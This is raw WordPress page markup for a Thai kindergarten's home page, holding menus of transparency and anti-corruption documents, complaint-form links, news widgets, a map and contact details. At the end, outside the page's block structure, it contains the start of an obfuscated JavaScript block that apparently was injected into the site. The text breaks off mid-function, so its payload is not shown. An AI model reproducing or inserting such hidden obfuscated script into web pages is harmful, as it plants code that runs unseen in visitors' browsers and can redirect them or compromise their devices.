gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 